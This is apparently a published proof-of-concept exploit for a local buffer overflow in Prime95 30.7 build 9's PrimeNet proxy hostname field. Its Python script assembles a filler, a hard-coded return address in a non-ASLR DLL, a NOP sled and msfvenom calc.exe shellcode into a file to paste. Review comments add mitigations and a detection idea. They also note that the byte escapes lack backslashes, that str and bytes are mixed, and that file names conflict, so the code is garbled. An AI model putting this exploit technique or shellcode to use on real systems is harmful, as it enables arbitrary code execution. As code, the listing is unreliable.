# Exploit Title: Prime95 Version 30.7 build 9 Buffer Overflow RCE
# Discovered by: Yehia Elghaly
# Discovered Date: 2022-04-25
# Vendor Homepage: https://www.mersenne.org/
# Software Link : https://www.mersenne.org/ftp_root/gimps/p95v307b9.win32.zip
# Tested Version: 30.7 build 9
# Vulnerability Type: Buffer Overflow (RCE) Local
# Tested on OS: Windows 7 Professional x86

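# Description: Prime95 version 30.7 build 9 is affected by a local buffer overflow in the optional proxy hostname field of the PrimeNet connection settings; overlong input in that field can lead to code execution.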

# 1- How to use: open the program go to test-PrimeNet-check the square-Connections
# 2- paste the contents of open.txt in the optional proxy hostname field and the calculator will open

# Proof-of-concept input generator: builds one long string and writes it to a
# text file. Per the header, that text is meant to be pasted into the optional
# proxy hostname field of the tested Prime95 build.
#
# NOTE(review): as rendered on this page the "x.." sequences are plain ASCII
# characters, not raw bytes, and the concatenation into `evil` mixes str with
# bytes (a TypeError on Python 3). The listing is kept verbatim.
#
# Defensive reading:
#   - The author's module note records libhwloc-15.dll as loaded with
#     ASLR: False / Rebase: False, which is what lets a fixed address be
#     hard-coded. Forcing ASLR and DEP for the process (e.g. via OS exploit
#     protection settings) removes that precondition.
#   - The root cause is missing length validation on the proxy hostname
#     input; check with the vendor for a build newer than the tested one.
#   - Detection idea: alert when the Prime95 process spawns a child process,
#     which it has no evident reason to do in this dialog.

# 144 filler characters placed before the 4-byte value below.
# presumably the distance to the saved return address -- TODO confirm
buffer = "A" * 144
# Author's note: address of a `push esp ; ret` sequence in libhwloc-15.dll
# | {PAGE_EXECUTE_READ} [libhwloc-15.dll] ASLR: False, Rebase: False,
# SafeSEH: False, OS: False, v-1.0- (C:exlibhwloc-15.dll)
jum = "xd8x29xe7x6e"
# Padding repeated 20 times ahead of the payload (author's label: NOP sled).
nop = "x90" * 20
# Defined but never used: `hot` is not part of `evil` below.
hot = "C" * 100

# Author's provenance note for the payload: generated with
#sudo msfvenom -p windows/exec CMD=calc.exe -b "x00x09x0Ax0d" -f python -v payload
# i.e. a demonstration payload that launches calc.exe, encoded to avoid the
# listed bad characters.
payload = b""
payload += b"xbbx72xd7x5dx16xdbxc0xd9x74x24xf4x5d"
payload += b"x29xc9xb1x31x83xc5x04x31x5dx0fx03x5d"
payload += b"x7dx35xa8xeax69x3bx53x13x69x5cxddxf6"
payload += b"x58x5cxb9x73xcax6cxc9xd6xe6x07x9fxc2"
payload += b"x7dx65x08xe4x36xc0x6excbxc7x79x52x4a"
payload += b"x4bx80x87xacx72x4bxdaxadxb3xb6x17xff"
payload += b"x6cxbcx8ax10x19x88x16x9ax51x1cx1fx7f"
payload += b"x21x1fx0ex2ex3ax46x90xd0xefxf2x99xca"
payload += b"xecx3fx53x60xc6xb4x62xa0x17x34xc8x8d"
payload += b"x98xc7x10xc9x1ex38x67x23x5dxc5x70xf0"
payload += b"x1cx11xf4xe3x86xd2xaexcfx37x36x28x9b"
payload += b"x3bxf3x3exc3x5fx02x92x7fx5bx8fx15x50"
payload += b"xeaxcbx31x74xb7x88x58x2dx1dx7ex64x2d"
payload += b"xfexdfxc0x25x12x0bx79x64x78xcax0fx12"
payload += b"xcexccx0fx1dx7exa5x3ex96x11xb2xbex7d"
payload += b"x56x4cxf5xdcxfexc5x50xb5x43x88x62x63"
payload += b"x87xb5xe0x86x77x42xf8xe2x72x0exbex1f"
payload += b"x0ex1fx2bx20xbdx20x7ex43x20xb3xe2xaa"
payload += b"xc7x33x80xb2"

# Layout of the generated input: filler, 4-byte address, padding, payload.
evil = buffer + jum + nop + payload

# Writes the input to PExploit.txt in the current directory ('w+' truncates an
# existing file). Note the header's usage step refers to "open.txt" instead.
# `file` shadows no Python 3 builtin, but the handle is not closed on error.
file = open('PExploit.txt','w+')
file.write(evil)
file.close()